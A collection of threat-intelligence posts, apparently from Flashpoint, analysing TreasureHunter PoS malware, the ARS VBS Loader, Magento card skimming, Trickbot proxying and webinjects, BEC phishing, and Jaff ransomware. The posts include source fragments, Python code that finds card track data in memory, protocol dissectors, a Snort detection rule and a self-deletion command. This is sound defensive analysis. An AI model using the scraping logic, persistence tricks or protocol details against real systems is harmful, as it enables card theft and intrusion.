      • Download and execute for updating;
      • Remote CMD command execution;
      • Remote self-removal for emergency cases.
    • Add anti-debugging:
      • Use self-debugging by creating a child process (may be improved later by reversing the tables);
      • Improve the MD5 function and use it to find debuggers by signatures (maybe to be added in future versions);
      • Use GetTickCount to detect parts of code being stepped through (maybe to be added in a “heuristical” joint algorithm with the abovementioned);
      • Upon finding a debugger, destroy the critical section and/or start creating new threads infinitely until the application crashes.
      • Maybe also kill processes and delete debuggers and/or decompilers permanently. We want the malware researchers screamin’!
  • Add better persistency and timeouts to gate communication.
  • Add local saving of data if the gate can’t be reached for a certain period of time.
  • Add the option to run the program as a service on Windows XP.
  • Improve the code structure and add comments to avoid future confusion.
  • Add error handling and backup restart in case of crash or heap overflow (malloc fail).
  • Improve the Clingfish system (so that a clingfish thread doesn’t do the same thing as the main thread right after being spawned).
  • Debug the system information extraction mechanism further (on different OS versions).
  • Improve the track-finding algorithm to make it faster.

The stolen dump structure is as follows; it holds the per-machine information and the origin of the scraped data that the malware needs to collect and operate on stolen dumps:

typedef struct dumpsHolder {
    TCHAR *lpFileName;       /* image name of the scanned process */
    int lpFileNameLength;
    int procID;              /* PID the track data was scraped from */
    char *trackArr;          /* scraped track data */
    int trackArrLength;
} dumpsHolder;

The process memory scan works with an exclusion list; processes whose path matches one of these entries are skipped:

char *scanExceptions[SCANEXCEPTIONSNUM] = {"System32", "SysWOW64", "\\Windows\\explorer.exe"};

The malware focuses on scraping credit card track data, keeping only cards with the following service codes:

char *serviceCodes[SERVICECODESNUM] = {"101", "201", "121", "231", "221", "110"};
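To show what those two arrays actually select, here is an added Python example (not TreasureHunter's code, and not a scraper for use on live systems) that applies the same service-code filter and process exclusions to a constructed memory buffer, with a Luhn check on the PAN so that random digit runs are not mistaken for cards. The track 2 layout (`;PAN=YYMM` + service code + discretionary data + `?`) and the Luhn algorithm are standard; the PANs are publicly known test numbers, and the case-insensitive substring match for the exclusion list is an assumption about how the C code compares paths.

```python
import re

# Added example, not TreasureHunter's code: reproduce the selection logic behind the
# scanExceptions[] and serviceCodes[] arrays on a constructed buffer, e.g. to build test
# fixtures for PoS memory-scraping detections. PANs are public test numbers.

SERVICE_CODES = {"101", "201", "121", "231", "221", "110"}            # from serviceCodes[]
SCAN_EXCEPTIONS = ("System32", "SysWOW64", r"\Windows\explorer.exe")  # from scanExceptions[]
# Track 2: start sentinel ';', PAN, '=', expiry YYMM, 3-digit service code, discretionary data, '?'
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d{0,20})\?")

SAMPLE_MEMORY = (
    b"\x00\x00MZ\x90\x00POS config v2\x00"
    b";4111111111111111=2512101123456789?"   # valid Luhn, service code 101 -> collected
    b"\x00\x00"
    b";5500000000000004=2512999123456789?"   # valid Luhn, service code 999 -> ignored
    b"\x00\xff"
    b";4111111111111112=2512201123456789?"   # targeted service code, fails Luhn -> ignored
    b"\x00"
)
SAMPLE_PROCESSES = {                          # constructed {image path: memory snapshot}
    r"C:\POS\pos.exe": SAMPLE_MEMORY,
    r"C:\Windows\explorer.exe": SAMPLE_MEMORY,
    r"C:\Windows\System32\svchost.exe": SAMPLE_MEMORY,
}


def luhn_ok(pan):
    """Standard Luhn checksum over a digit string."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def is_excluded(image_path):
    """Assumed semantics of scanExceptions[]: skip any path containing one of the entries."""
    return any(ex.lower() in image_path.lower() for ex in SCAN_EXCEPTIONS)


def find_track2(buf):
    """Track 2 records in a memory buffer that pass Luhn and carry a targeted service code."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan, expiry, service_code, _ = (g.decode() for g in m.groups())
        if service_code in SERVICE_CODES and luhn_ok(pan):
            hits.append({"pan": pan, "expiry": expiry, "service_code": service_code,
                         "offset": m.start()})
    return hits


def scan_processes(processes):
    """Apply the exclusion list, then scan the remaining processes' memory."""
    return {path: find_track2(mem) for path, mem in processes.items() if not is_excluded(path)}


if __name__ == "__main__":
    for path, hits in scan_processes(SAMPLE_PROCESSES).items():
        print(path, hits)
```

The service-code filter is worth noting from the defender's side: codes 1xx and 2xx mark cards usable internationally, and the second digit of 0 or 1 marks cards authorized without online verification, so the list is a deliberate choice of the dumps that resell best, not an accident of the parser.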

Registry persistence: the malware registers itself for autostart under HKLM\Software\Microsoft\Windows\CurrentVersion\Run as “jucheck,” borrowing the name of the Java Update Checker executable.

Image 3: A registry key created by the malware for persistence.

The source code is consistent with the various samples seen in the wild over the last few years. TreasureHunter’s config.h shows definite signs of modification over the lifespan of the malware. Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER values to be overwritten by the builder. More recent samples, and the source code, instead write the config values directly into the fields; this makes the samples slightly smaller and means each reconfiguration is a fresh compile.

The post TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked appeared first on Flashpoint.

Author: Flashpoint

RAT Gone Rogue: Meet ARS VBS Loader

Malicious VBScript has long been a fixture of spam and phishing campaigns, but until recently its functionality has been limited to downloading malware from an attacker-controlled server and executing it on a compromised computer.

Researchers at Flashpoint have seen and analyzed a unique departure from this norm in ARS VBS Loader, a spin-off of a popular downloader called SafeLoader VBS that was sold and eventually leaked in 2015 on Russian crimeware forums.

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious “loaders”, i.e. initial infection vector malware families used to install subsequent payloads.

Image 1: ARS VBS Loader’s administrative login portal.

The new loader has been spammed out in email attachments enticing victims with lures in subject lines related to personal banking, package shipments, and toll road notifications. Should a victim interact with the attachment and launch it, analysts say numerous types of commodity malware could be installed, including the AZORult information-stealing malware. AZORult was also used in campaigns targeting more than 1,000 Magento admin panels; in those attacks, the malware was used to scrape payment card information from sites running the popular free and open source ecommerce platform.

ARS VBS Loader targets only Windows machines and supports Windows 10, according to posts to a Russian-speaking forum going back to December. Previously, another loader called FUD ASPC Loader, first advertised in May 2017, contained similar functionality but not Windows 10 support.

The loader is also likely to side-step detection by signature-based antivirus and intrusion detection systems because of the relative ease with which attackers can obfuscate VBScript, Flashpoint analysts said. Obfuscation through a variety of means allows attackers to hide malware; if the malware is obfuscated with encryption or packing, for example, it is exponentially more difficult for antivirus to sniff out the malicious code.

Once the ARS VBS Loader executes on a victim’s computer, it immediately creates a number of entries in nearly a dozen autorun locations, including registry, scheduled tasks, and the startup folder, ensuring persistence through reboots. ARS VBS Loader will connect to the attacker’s server, sending it system information such as the operating system version name, computer user name, RAM, processor and graphics card information, a randomly generated ID for infection tracking, and machine architecture information.

Image 2: ARS VBS Loader submits check-in information to the C2 in GET and POST parameters.

The botmaster, meanwhile, can remotely issue commands to bots through the PHP command-and-control application. Communication with the command-and-control server is carried out in plaintext over HTTP, making it easy to spot, Flashpoint analysts said.

The malicious code that runs on the victim’s machine is written entirely in VBScript and contains functionality for updating and deleting itself, deploying plugins such as a credential stealer, launching application-layer denial-of-service (DoS) attacks against websites, and loading additional malware from external websites.

The most common command spotted by analysts is download, which instructs bots to download and execute malware from a supplied URL. There is also the plugin command where plugins that steal passwords or capture desktop screenshots can be pushed to compromised computers.

The DDoS command is also noteworthy because it is a unique capability; analysts said they have not seen this command used in the wild. The command tells bots to send a specified number of HTTP POST requests to a particular URL. Since this is a simple application-layer flooding attack, it is currently unknown how successful it would be against targets in the wild, analysts said, adding that such traffic would be easy to spot because the same hardcoded POST values are sent throughout the HTTP flood.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Analysts caution that users should be vigilant about not opening email attachments from unknown sources, and that it’s likely ARS VBS Loader will continue to be an effective initial infection vector for spam campaigns.

To download the indicators of compromise (IOCs) for the ARS VBS Loader, click here.

To download the Yara rule for the ARS VBS Loader, click here.

The post RAT Gone Rogue: Meet ARS VBS Loader appeared first on Flashpoint.

Author: Flashpoint

Compromised Magento Sites Delivering Malware

Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.

Researchers at Flashpoint are aware of the compromise of at least 1,000 Magento admin panels, and said that interest in the platform has continued unabated on entry-level and top-tier Deep & Dark Web forums since 2016. Attackers have also demonstrated continued interest in other popular ecommerce-processing content management systems such as Powerfront CMS and OpenCart.

The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials. Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access to the panels.

Once the attacker has control of the site’s Magento CMS admin panel, they have unfettered access to the site and the ability to add any script they choose. In this case, the attackers were injecting malicious code in the Magento core file, allowing them access to pages where payment data is processed. POST requests to the server containing sensitive data are then intercepted and redirected to the attacker.

Flashpoint analysts said the compromised sites return an exploit in the form of a phony Adobe Flash Player update, which if launched by the user runs malicious JavaScript that downloads malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner. The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.

Image 1: Anatomy of the attack.

Flashpoint said that most of the victims among the 1,000 panels it is aware of are in the education and healthcare industries, and that the IP addresses of the compromised panels map to locations in the United States and Europe.

Analysts assess that these are likely only a subset of a larger population of compromised Magento panels.

Flashpoint is working with law enforcement to notify victims of these compromises.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

In the meantime, the rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks, in which hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords. The compromised IoT devices were corralled into a massive botnet that was pointed at a number of high-value targets, including DNS provider Dyn, French webhost OVH, and journalist Brian Krebs’ website, in order to carry out crippling distributed denial-of-service attacks. The DDoS attack against Dyn peaked at 1 terabyte-per-second and took a number of popular websites and services offline for the better part of a day in October 2016, including Twitter, Spotify and GitHub.

Magento admins are advised to review CMS account logins and mitigate their exposure to brute-force attacks by enforcing the following password-hygiene practices:

  • Enforce organizational password complexity requirements.
  • Restrict users from recycling previously used passwords.
  • Enable two-factor authentication for sensitive systems, applications, databases, and remote access solutions.
  • Supply users with secure password managers to assist with password requirements.

The indicators of compromise (IOCs) for AZORult, Rarog, and the campaign targeting Magento are available for download here. The Yara rule is available for download here.

The post Compromised Magento Sites Delivering Malware appeared first on Flashpoint.

Author: Flashpoint

Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model

Individuals who reuse login credentials across multiple sites are more susceptible to account checking attacks, which occur when threat actors use credentials stolen from past database breaches or compromises to gain unauthorized access to other accounts belonging to the same victims. However, the process of mining compromised data for correct username and password combinations requires significant computer processing power and proxy pool lists to be successful — a capability that is now exhibited by the Trickbot gang.

Considered to be the successor of the formidable Dyre banking Trojan gang, the Trickbot banking Trojan gang continues to evolve by adopting new attack methods and targeting various industries. While Trickbot predominantly targeted the financial industry, it has now expanded its targeting to other industries via its account checking activities; these are perpetrated through the backconnect SOCKS5 module, which enlists victims as proxies. Enlisting victims as proxies allows the gang to perform account checking activity from the same IP addresses as its victims. The gang’s account checking operation requires a steady stream of new and “clean” proxies so that its activity is not automatically blocked by companies’ IP-origin anti-fraud systems; therefore, existing infections are turned into account checking proxies.

Image 1: The process of Trickbot’s backconnect proxy account checking activity. In the first step, the Trickbot gang distributes email spam. In the second step, the victim opens the spam attachment. In the third step, Trickbot downloads and executes the payload from the payload server on the compromised machine. In the fourth step, the victim machine downloads the backconnect SOCKS5 proxy module from the module server. Then, the victim connects to the preconfigured gang’s backconnect server. Finally, the Trickbot gang connects to the victim enlisting their machine’s IP as its proxy for account checking activities via its backconnect SOCKS5 module.

The Trickbot gang continues to search for ways to monetize infections by adopting a hybrid attack model, which utilizes both Trickbot modular payloads and knowledgeable fraud operators. The Trickbot gang has also extended its operations to include account checking activity; such attacks are a combination of malware expertise and knowledgeable human operators. This hybrid approach allows Trickbot operators to launch account checking attacks leveraging infected victims as proxies.

Distributed through malicious Microsoft Office documents via email spam campaigns, Trickbot is notable for loading its backconnect SOCKS5 module bcClientDllTest onto compromised machines. This module is used extensively by the gang for account checking activity.

From Aug. 17 to the present, analysts observed close to 6,000 unique compromised machines associated with Trickbot SOCKS5 proxy module activities. Of these machines, more than 200 of them were actively enlisted for account checking fraud activities at any one time.

Image 2: The Trickbot SOCKS5 backconnect module contains authorization backconnect logic to check in to the backend.

Trickbot’s backconnect communication protocol supports the following client-server commands, each sent with the command prefix “c”:

● disconnect: Terminate the backconnect server connection
● idle: Maintain the client-server connection
● connect: Connect to the backconnect server. The command must carry the following parameters:

○ ip: Backconnect server’s IP address
○ auth_swith: Use authorization flag. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
○ auth_ip: Authentication IP address
○ auth_login: Authentication login
○ auth_pass: Authentication password

Image 3: A Trickbot victim connects to the Trickbot backconnect server.

There are three main Trickbot SOCKS5 server-client commands:

● c=idle
● c=disconnect
● c=connect

Trickbot victims create a sequence of GET requests to the server on gate[.]php:

● client_id=&connected=&server_port=&debug=

The server responds with a POST request with the following parameters if the connection needs to be established:

● c=connect&ip=&auth_swith=&auth_ip=&auth_login=&auth_pass=

If the connection needs to be terminated, the server will respond with c=disconnect.
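An added example (not Flashpoint’s code and not the malware’s): a small Python dissector for the gate.php exchange described above. It parses the victim’s check-in query, applies the auth_swith rule to a server response, and flags check-ins in web-proxy log lines; the field names are the ones listed above, and all traffic samples are constructed.

```python
"""Dissector for the Trickbot SOCKS5 backconnect gate.php exchange.

Added example; field names follow the protocol description above, and all
sample traffic is constructed (RFC 5737 addresses, made-up client IDs).
"""
from urllib.parse import urlparse, parse_qs

# The four query parameters a victim sends on every check-in to gate.php.
CHECKIN_FIELDS = ("client_id", "connected", "server_port", "debug")
# The values the server uses in its command prefix "c".
COMMANDS = ("idle", "disconnect", "connect")


def _flat(qs: str) -> dict:
    """parse_qs returns lists; the protocol carries single values, so flatten."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def parse_checkin(request_line: str):
    """Return the check-in parameters from an HTTP request line, or None when
    the line is not the Trickbot pattern (GET to gate.php with all four fields)."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    url = urlparse(parts[1])
    if not url.path.lower().endswith("/gate.php"):
        return None
    params = _flat(url.query)
    if not all(f in params for f in CHECKIN_FIELDS):
        return None
    return params


def parse_command(body: str) -> dict:
    """Parse a server response such as c=connect&ip=...&auth_swith=...

    For connect, "auth" records how the victim authenticates to the backconnect
    server: "credentials" (auth_swith=1), "source_ip" (auth_swith=0), or None
    for any other value, in which case no connection is established.
    """
    params = _flat(body)
    cmd = params.get("c")
    if cmd not in COMMANDS:
        raise ValueError(f"unknown backconnect command: {cmd!r}")
    result = {"command": cmd}
    if cmd != "connect":
        return result
    result["ip"] = params.get("ip", "")
    switch = params.get("auth_swith")  # spelled as in the protocol description
    if switch == "1":
        result["auth"] = "credentials"
        result["auth_login"] = params.get("auth_login", "")
        result["auth_pass"] = params.get("auth_pass", "")
    elif switch == "0":
        result["auth"] = "source_ip"
        result["auth_ip"] = params.get("auth_ip", "")
    else:
        result["auth"] = None
    return result


def find_checkins(log_lines) -> list:
    """Detection pass over common-log-format lines: return (client_id, line_no)
    for every request that matches the gate.php check-in pattern."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        start = line.find('"')            # request is the first quoted field
        end = line.find('"', start + 1)
        if start < 0 or end < 0:
            continue
        params = parse_checkin(line[start + 1:end])
        if params:
            hits.append((params["client_id"], n))
    return hits


# Constructed sample log: two check-ins 100 seconds apart and one unrelated hit.
SAMPLE_LOG = [
    '10.0.0.7 - - [17/Aug/2017:10:00:00 +0000] "GET /gate.php?client_id=7F3A&connected=0&server_port=0&debug=0 HTTP/1.1" 200 61',
    '10.0.0.7 - - [17/Aug/2017:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [17/Aug/2017:10:01:40 +0000] "GET /gate.php?client_id=7F3A&connected=1&server_port=1080&debug=0 HTTP/1.1" 200 10',
]
SAMPLE_CONNECT = "c=connect&ip=198.51.100.20&auth_swith=1&auth_ip=&auth_login=bot&auth_pass=secret"
SAMPLE_BAD_SWITCH = "c=connect&ip=198.51.100.20&auth_swith=2&auth_ip=&auth_login=&auth_pass="

if __name__ == "__main__":
    print(find_checkins(SAMPLE_LOG))
    print(parse_command(SAMPLE_CONNECT))
    print(parse_command(SAMPLE_BAD_SWITCH))
    print(parse_command("c=disconnect"))
```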

Image 4: The Trickbot machine actively pings the server every 100 seconds.

Most notably, once compromised, Trickbot targets customers of financial institutions via webinjects and redirection attacks. The Trojan also uses victim IPs as proxies to leverage username and password combinations for account checking activity. The observed account checking activity mainly targets customers of companies in nine industries, most of those in gaming. Notably, some of the targets appear to be Russia-based companies.

Image 5: Trickbot account checking activities mainly target customers in nine industries.

Trickbot account checking activity is mainly directed to customers of U.S.- and Russia-based companies operating in the following industries:

● Gaming
● Technology
● Financial
● Entertainment
● Adult
● Social Media
● Retail
● Rewards
● Cryptocurrency

Likely leveraging commercial account checker tools, the Trickbot gang and its associates heavily utilize their victims’ IPs as proxies for account checking activity that imitates mobile-device account logins. Their attacks leave various web application artifacts, such as spoofed user agent and device information, making it appear as if the activity was performed from mobile devices. Such mobile logins are meant to bypass traditional anti-fraud controls, which are largely implemented to address web-based logins. In cybercriminals’ pursuit of targets, their attempts at evading anti-fraud systems are thus dictated by a company’s anti-fraud controls, which are in turn influenced by cybercriminal tactics, techniques, and procedures (TTPs). Analysts assess with moderate confidence that the Trickbot operators will likely continue to monetize infections by turning victims’ IPs into proxies that subsequently fuel account checking activities.

The post Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model appeared first on Flashpoint.

Author: Flashpoint

BEC Campaigns Target Organizations Across Sectors Using Credential Phishing

In general, business email compromise (BEC) scams are widely viewed as a type of cybercrime that necessitates relatively minimal technical ability. Despite this, analysts industry-wide have observed BEC operators progressing from simple schemes such as 419 and fake lottery scams – in which unwitting victims are duped into sending payments to fraudsters after being promised large sums – towards experimenting with malware and creating sophisticated networks in order to quickly and reliably move money from one account to another.

Through source intelligence, Flashpoint identified a recent credential phishing campaign that had a low detection rate due to its simplicity; the campaign relied on malicious PDF files containing embedded links that redirected potential victims to credential-harvesting phishing sites.

Threat actors sent seventy-three malicious PDFs in credential phishing campaigns between March 28, 2017 and August 8, 2017. These malicious PDFs targeted a range of verticals, including universities, software and technology companies, retailers, engineering organizations, real estate firms, and churches, with the goal of harvesting user credentials.

Of the seventy-three files identified, analysts were able to identify seventy unique Uniform Resource Identifiers (URIs); many of these overlapped based on domains. Attackers used twenty-nine different domains across these documents.

Image 1: A sample of the domains utilized by the actors across campaigns.

A potential victim of this phishing campaign would receive a malicious PDF containing a malicious link. Upon opening the PDF, the potential victim would be presented with a prompt to view a secure online document; when clicked, this prompt would redirect the victim to a phishing website to input their login credentials.

Image 2: Upon opening the malicious PDF, a potential victim sees a prompt to access a secure online document, which directs them to a phishing page.

Once on the phishing page, the potential victim is presented with several options to “download” the file and is asked for login credentials for their organization. Once a victim enters their login credentials, the script redirects the victim to a document or web page owned by the targeted organization.

Image 3: A view of the phishing webpage for harvesting credentials.

If valid credentials were submitted, the actors behind the phishing campaign would harvest them. Once harvested, the threat actors would then use the compromised accounts to send phishing emails to victims’ contacts; the emails may have been viewed as “trusted” by email services given that they were coming from legitimate email accounts. This practice helps threat actors committing Business Email Compromise (BEC) gain a better foothold into target organizations, and allows them to potentially breach additional organizations. Actors can also use the credentials from compromised accounts to monitor inboxes for additional incoming and outgoing information.

Assessment

Flashpoint analysts assess that these attacks are likely being carried out by attackers located in Western Africa due to the originating IP addresses of the phishing emails, as well as the actors’ tactics, techniques, and procedures (TTPs), such as the focus on credential phishing, the absence of malware, and a lack of operations security (OPSEC) practices on the attackers’ part.

Based on artifacts left in the PDFs, these documents likely represent a small glimpse into the credential phishing community of West African cybercriminals.

Image 4: A phishing email sent from a cloud-provided email service provider has a Nigerian IP address as the originating IP.

While BEC actors operating out of western Africa are broadly considered among the lowest-skilled cyber threat actors, they have been responsible for more than $5 billion USD in fraud in the last three years. In comparison, ransomware was projected to be a $1 billion USD industry in 2016, and Europol estimated that the now-defunct AlphaBay Market was responsible for almost $1 billion USD in business between its creation in 2014 and its closure in July 2017.

BEC actors and cybercriminals located in West Africa typically do not make significant efforts to enhance their OPSEC practices or conceal their locations; however, they are still largely successful in stealing billions of dollars from publicly traded and high-profile organizations each year.

The post BEC Campaigns Target Organizations Across Sectors Using Credential Phishing appeared first on Flashpoint.

Author: Chelsea Sawicki

With a boost from Necurs, Trickbot expands its targeting to numerous U.S. financial institutions

The Necurs botnet first emerged in 2012 and has since become notorious for powering massive, malware-laden spam campaigns. Although the botnet’s historical association with Locky and Jaff Ransomware has long raised concerns from organizations across all sectors, Necurs is now delivering a different type of malware that poses a threat specifically to the financial sector: the Trickbot banking Trojan.

Trickbot has been responsible for man-in-the-browser (MitB) attacks since mid-2016, yet the malware’s webinject configuration has only targeted financial institutions located outside of the U.S. — up until now. Starting on July 17, 2017, Flashpoint observed a new, Necurs-powered Trickbot spam campaign containing an expanded webinject configuration developed to target and infect customers of international and U.S.-based financial institutions. The latest Trickbot campaign, known as “mac1,” targets customers of various institutions in the U.S., U.K., New Zealand, France, Australia, Norway, Sweden, Iceland, Finland, Canada, Italy, Spain, Switzerland, Luxembourg, Belgium, Singapore, and Denmark.

Thus far, mac1 has fueled at least three different spam waves — all of which have included the Trickbot loader as a final payload. The initial spam wave contained an HTML email masquerading as a bill from an Australian telecommunications company. These malicious emails contained a Zip-archived Windows Script File (WSF) attachment consisting of obfuscated JavaScript code. Upon being clicked, the files download and execute the Trickbot loader. Although this wave utilized malicious WSF scripts as the initial vector of infection, subsequent campaigns have evolved and appear to instead utilize malicious macro-laden documents as their attachments.

Image 1: Trickbot mac1 lure email masquerading as a telecommunications billing notice.

Trickbot Analysis

Upon infecting a machine, Trickbot initially creates a process using the “CREATE_SUSPENDED” flag before injecting its module and terminating the initial thread used to launch the Trojan.

Next, Trickbot creates a folder in %APPDATA%, copies itself there, adds an authroot certificate file in %TEMP%, and adds update[.]job as a service in the Windows Task folder for persistence. Trickbot stores an encoded configuration module in the “resource” section of its binary and retrieves additional modules from its controller domains when needed.

Image 2: The Trickbot mac1 main configuration includes various IP domains on port 443.

Trickbot’s mac1 main configuration is as follows:

1000027
mac1

The certificate is set with the expiration date as follows:


The Trickbot’s server configuration is as follows:


Trickbot’s module configuration is as follows:

yesyes


Trickbot also contains importDll32, mailsearcher32, systeminfo32, injectDll32, and outlookDl32 modules.

Image 3: Trickbot’s various modules include “mailsearcher32”.

Flashpoint observed Trickbot’s mac1 static (“sinj”) and dynamic (“dinj”) webinject modules targeting customers of U.S. and international financial institutions in the following three formats:

*/error_path/404[.]html*

<sinj

*

*.gif*
*.jpg*
*.png*
*.js*
*.css*
*text/html*

Furthermore, Flashpoint’s malware analysis revealed significant similarities between the Trickbot banking Trojan and the Dyre banking Trojan. Indeed, Trickbot is considered to be Dyre’s successor. As such, it’s possible that Trickbot’s author may have either had deep knowledge of Dyre or simply re-used old source code. The Dyre cybercriminal syndicate has historically targeted various Western financial institutions including those located in the U.S., U.K., and Canada. Following a takedown by Russian law enforcement, the Dyre banking Trojan gang ceased operations in 2015; their old aliases have since disappeared from the underground.

Conclusion

Since the Trickbot banking Trojan’s mac1 campaign remains fueled by the powerful Necurs botnet, it will likely continue to evolve and target customers of U.S. and international financial institutions. Anti-fraud programs are an important part of many FI programs to detect and counter this threat to their customer base. As threats posed by malware such as Trickbot continue to emerge and their targets expand, it is crucial for all organizations and their users to be extra vigilant in their security practices.

The Trickbot mac1 Indicators of Compromise (IOCs) are available for download here.

The post With a boost from Necurs, Trickbot expands its targeting to numerous U.S. financial institutions appeared first on Flashpoint.

Author: Chelsea Sawicki

“Necurs” Botnet Fuels Massive Spam Campaigns Spreading “Jaff” Ransomware

Starting on May 11, 2017, Flashpoint analysts observed several large spam campaigns originating from the Necurs botnet that aim to dupe recipients into opening malicious attachments that infect their computers with “Jaff” ransomware. These spam campaigns feature a multi-stage infection chain including a PDF file, a malicious Microsoft Office document, and finally, the Jaff ransomware loader. This same infection chain has been utilized in the past to infect computers with the Dridex banking Trojan and Jaff’s predecessor, Locky ransomware.

Image 1: The Necurs-Jaff delivery chain reveals heavy usage of PDF attachments.

The Necurs botnet is comprised of smaller “sub-botnets” distinguishable by the seed value used in the malware’s code for the domain generation algorithm (DGA). Although these sub-botnets send different kinds of spam when compared to one another, they all share the same command-and-control (C2) infrastructure. Flashpoint has thus far observed Jaff ransomware emanate from the spam module with a DGA seed of nine.

Prior to a spam run, the node infected with the Necurs malware will first perform a series of checks to ensure it is capable of sending spam. The infected node first receives an updated list of C2 IP addresses for the spam module before it verifies Internet connectivity by downloading Service Pack 1 for Windows 7. Once these checks pass, the bot will do a final connectivity check for Simple Mail Transfer Protocol (SMTP; TCP Port 25) as depicted in the following packet capture:

Image 2: Packet capture of connectivity checks and spam from a Necurs bot.

Image 3: Malspam with fake headers sent from the Necurs botnet contains a malicious PDF attachment.

Ransomware Analysis

The spam attachments are PDF files containing JavaScript code that automatically executes upon opening the file via the “OpenAction” function. This JavaScript code extracts an embedded, malicious Office document from an object section of the PDF file.

Image 4: Victims may be prompted to open a malicious Office document when viewing the PDF spam attachment.

Image 5: The encoded Office document in one of the PDF sections.

The next item in the infection chain is the malicious Microsoft Office document that is opened via the JavaScript code in the PDF file. This Word document contains macros that download an encrypted binary from one of four URLs, decrypt it with a hardcoded XOR key, and then execute the binary – the Jaff ransomware loader.

Image 6: The Word document that is opened by the PDF file.

Image 7: The hardcoded XOR key used to decode the ransomware loader executable.

The Jaff ransomware is a 32-bit Windows executable, containing the malicious obfuscated code. Jaff explicitly targets Windows systems, enumerating the targets’ local file system by searching for specific file extensions to encrypt. Files that have been encrypted are renamed appending the extension .wlu or .jaff. Such extensions are typical for this ransomware. The victim obtains a unique Jaff ID on the Tor website.

The Jaff ransomware sets encryption messages localized to the language detected in the system. Just like its previous variant Locky, this ransomware renders and saves bitmap files in each directory with the encrypted files. The bitmap file is used as a wallpaper displaying the ransom message.

Images 8-10: The Jaff ransomware attack reveals encryption and its personalized HTML and Bitmap files after the infection.

Jaff enumerates drive letters A to Z through the GetDrive API, looking for various types of local drives such as fixed, storage, and removable.

Jaff ransomware is designed to encrypt files even if the C2 check-in fails. However, based on the most current assessment, Jaff sends a GET request to the Jaff domain for a path ending in /a5, which leads to the following possible Snort signature (the sid is a placeholder in the local range):

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Jaff C2 check-in"; flow:to_server,established; content:"GET"; http_method; content:"/a5/"; nocase; http_uri; pcre:"/\/a5\/?$/Ui"; classtype:trojan-activity; sid:1000001; rev:1;)

Image 11: The Jaff ransomware enumerates drives from A to Z before launching its encryption threads.

Based on analysis of the ransomware code, it is apparent that Jaff uses both the RSA and AES encryption algorithms via the Windows Crypto API. The ransomware encrypts files by appending approximately 100 bytes to each file with a WriteFile Windows API call, for every file matching a target extension.

Image 12: Jaff sets the nBytestoWrite argument when appending the encryption blob to each file.

The Jaff ransomware is designed not to run under certain conditions. This mechanism can be imitated, leading to the creation of a mitigation strategy that can be used on machines before infection.

Image 13: Jaff checks for the presence of Russian-language locale on each machine.

On a US English-language machine, the API calls GetSystemDefaultLangID and GetUserDefaultLangID return 0x0409 in the extended accumulator register (EAX); 0x0409 is the Windows language identifier (LANGID) for English (United States). Jaff, however, masks the 16-bit return value in AX with 0x3FF, which keeps only the primary language ID (the low 10 bits of the LANGID) and discards the sublanguage bits, and then compares the result with the hardcoded value 0x19, the primary language ID for Russian. Russian (Russia) has the LANGID 0x0419, so the masked value equals 0x19 for any Russian sublanguage, not just that one locale.

Below is the relevant disassembled routine that checks whether the ransomware is running on a Russian-language machine:

call    GetUserDefaultLangID       ; AX = LANGID of the user's Region Format setting
mov     edx, 3FFh                  ; primary-language mask (low 10 bits)
and     ax, dx                     ; drop the sublanguage bits
cmp     ax, 19h                    ; LANG_RUSSIAN
je      .TerminateRansomwareProcess
call    GetSystemDefaultLangID     ; AX = LANGID of the system locale
mov     edx, 3FFh
and     ax, dx
cmp     ax, 19h                    ; LANG_RUSSIAN
je      .TerminateRansomwareProcess

Image 14: Jaff checks for the hardcoded value 0x19, the primary language ID that forms the last two hex digits of the Russian LANGID 0x0419.

Image 15: Jaff targets a long list of file extensions and deletes itself via a cmd.exe command.

Additionally, once it has launched successfully, Jaff uses a simple self-deletion routine: it runs cmd.exe /c del /Q /F followed by the path of its own executable, removing the original ransomware binary from the victim machine so that only the encrypted files and ransom notes remain for analysis.

The following file extensions are targeted by the Jaff ransomware:

